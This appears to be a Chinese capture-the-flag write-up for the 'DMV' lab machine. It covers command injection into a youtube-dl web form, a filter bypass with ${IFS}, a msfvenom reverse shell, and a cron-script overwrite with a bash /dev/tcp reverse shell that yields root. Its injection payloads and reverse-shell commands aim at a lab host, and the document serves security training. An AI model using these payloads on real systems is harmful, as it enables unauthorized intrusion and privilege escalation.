I"B<h3 id="主机识别">主机识别</h3>

<p><code class="language-plaintext highlighter-rouge">nmap -sn 192.168.1.1/24</code></p>

<h3 id="网络拓扑">网络拓扑</h3>

<table>
  <thead>
    <tr>
      <th>计算机</th>
      <th>IP</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>Kali</td>
      <td><code class="language-plaintext highlighter-rouge">192.168.1.105</code></td>
    </tr>
    <tr>
      <td>DMV</td>
      <td><code class="language-plaintext highlighter-rouge">192.168.1.110</code></td>
    </tr>
  </tbody>
</table>

<h3 id="扫描端口和版本信息">扫描端口和版本信息</h3>

<p><code class="language-plaintext highlighter-rouge">nmap -A 192.168.1.110</code></p>

<p><img src="https://i.loli.net/2020/05/05/sFEkw6RG9WDnMaQ.png" alt="1.png" /></p>

<h3 id="访问web并确定web应用">访问Web并确定web应用</h3>

<p>访问 <em>80</em> 端口有个输入框，此外查看网页源码发现一个 JS 脚本。大意就是将用户输入的内容作为值与字符串（<em><code class="language-plaintext highlighter-rouge">https://www.youtube.com/watch?v=</code></em>）结合传递给 <em>yt_url</em> 参数，并根据返回结果做出相应输出，因此这里可能存在命令注入漏洞</p>

<p><img src="https://i.loli.net/2020/05/05/LgI1ki4FdDfKeQM.png" alt="2.png" /></p>

<p><img src="https://i.loli.net/2020/05/05/F74AqkzCRbMODst.png" alt="3.png" /></p>

<p>在输出框里输入 <em>123</em>，并转到 BP 上进行操作</p>

<p><img src="https://i.loli.net/2020/05/05/SKe41zHvWLukOnX.png" alt="4.png" /></p>

<p>根据返回的报错信息可以确定服务器端运行 <strong>youtube-dl</strong> 这一下载 YouTube 上视频的命令行程序，通过查看支持的参数，发现 <code class="language-plaintext highlighter-rouge">--exec</code> 参数可以执行命令</p>

<p><img src="https://i.loli.net/2020/05/05/Wd6wvbjKoEhPnur.png" alt="5.png" /></p>

<p>结果经过多次尝试发现并不能正常执行，同时也确定服务器端存在字符过滤。要想知道哪些字符被过滤，哪些字符没有过滤，那么就需要进行 Fuzzing</p>

<blockquote>
  <p>使用 <a href="https://github.com/danielmiessler/SecLists">SecLists</a> 字典库中 Fuzzing 部分的 <em>special-chars.txt</em> 字典进行操作</p>
</blockquote>

<p><img src="https://i.loli.net/2020/05/05/8pC7VwFRNimhOlL.png" alt="6.png" /></p>

<p>根据返回结果的不同，可以发现返回结果中带 <em>sh: 1: cannot open</em> 字符串的都是没有被过滤的字符，因此对执行结果进行过滤后确定以下字符没有被过滤</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre></td> --><td class="rouge-code"><pre><span class="o">(</span>
<span class="o">)</span>
&amp;
<span class="sb">`</span>
|
<span class="s1">'
"
&lt;
;
</span></pre></td></tr></tbody></table></code></pre></div></div>

<p><img src="https://i.loli.net/2020/05/05/pDd2MWgePqwNuQ5.png" alt="7.png" /></p>

<p>其中反引号在 Linux 系统中可以执行命令，比如</p>

<p><code class="language-plaintext highlighter-rouge">echo \</code>ls``</p>

<p>此外分号起到分隔命令的作用，多次尝试后如下传参，命令可以正常执行</p>

<p><img src="https://i.loli.net/2020/05/05/V3MCPkOSNzaYRGo.png" alt="8.png" /></p>

<p>但是当命令中存在空格时也会被过滤</p>

<p><img src="https://i.loli.net/2020/05/05/6wFgnxqe2GlUj4T.png" alt="9.png" /></p>

<p>采用 Linux 中<a href="https://www.freebuf.com/articles/web/137923.html">空格绕过</a>方法，将空格替换为<code class="language-plaintext highlighter-rouge">${IFS}</code>可以绕过</p>

<p><img src="https://i.loli.net/2020/05/05/G76RIu1hdWoU4Kx.png" alt="10.png" /></p>

<h3 id="寻找-flag-文件">寻找 Flag 文件</h3>

<p><img src="https://i.loli.net/2020/05/05/FuiVrIexgBWMtPs.png" alt="11.png" /></p>

<p>在 <code class="language-plaintext highlighter-rouge">/var/www/html/admin</code> 目录下存在 <code class="language-plaintext highlighter-rouge">_flag.txt_</code> 文件，因此如下传参就可以读到文件内容</p>

<pre><code class="line-numbers">yt_url=%3c`cat${IFS}/var/www/html/admin/flag.txt`
</code></pre>

<p>接下来的步骤就是读 <em>/root</em> 目录下的 flag 文件了。为了操作方便，进行 getshell</p>

<blockquote>
  <p>本机（Kali）开启 <strong>8088</strong> 端口（<code class="language-plaintext highlighter-rouge">python3 -m http.server 8088</code>），并且在目录下使用 <em>msfvenom</em> 生成反向 shell 脚本</p>

  <p><code class="language-plaintext highlighter-rouge">msfvenom -p python/shell_reverse_tcp LHOST=192.168.1.105 LPORT=8866 -f raw &gt; recvshell.py</code></p>
</blockquote>

<p><img src="https://i.loli.net/2020/05/05/Au1kxdQlcwB4XFj.png" alt="12.png" /></p>

<p>在本机监听 <strong>8866</strong> 端口，就可以 getshell</p>

<p><img src="https://i.loli.net/2020/05/05/MuymelzCY3DQLjA.png" alt="13.png" /></p>

<p>得到 <em>itsmeadmin</em> 账号密码和一段 shell 脚本 （<em>clean.sh</em>)</p>

<p><code class="language-plaintext highlighter-rouge">rm - rf downloads</code></p>

<p>看来在此之前将 <em>downloads</em> 目录给删除了，这时想到 CTF 中遇到脚本的常见套路就是定时任务 <em>crontab</em> 了，因此我们将此连接转到 <em>bash</em></p>

<p><img src="https://i.loli.net/2020/05/05/OELFSwcKiAvonTH.png" alt="14.png" /></p>

<p>本机监听 <strong>4466</strong> 端口，并在 GitHub 上下载 <a href="https://github.com/DominicBreuker/pspy">pspy</a> 程序，该程序的功能就是旨在无需 root 权限即可监听进程。因此我们可以查看是否存在 <em>cron</em> 进程。这里我们根据虚拟机的信息下载 64 位的程序</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td> --><td class="rouge-code"><pre>wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
./pspy64
</pre></td></tr></tbody></table></code></pre></div></div>

<p><img src="https://i.loli.net/2020/05/05/MmcRhSIviB4baPl.png" alt="15.png" /></p>

<p>可以看到 root 用户使用 <em>cron</em> 每一分钟自动执行 <em>clean.sh</em> 脚本。接下来的工作很明显，只要我们把脚本写到 clean.sh 文件就会被 root 用户自动执行，因此执行该命令</p>

<p><code class="language-plaintext highlighter-rouge">echo "bash -c 'bash -i &gt;&amp; /dev/tcp/192.168.1.105/4455 0&gt;&amp;1'" &gt; /var/www/html/tmp/clean.sh</code></p>

<p>本机监听 <strong>4455</strong> 端口，再过一分钟就可以拿到 root 权限</p>

<p><img src="https://i.loli.net/2020/05/05/RhfNITCVspxnerK.png" alt="16.png" /></p>
:ET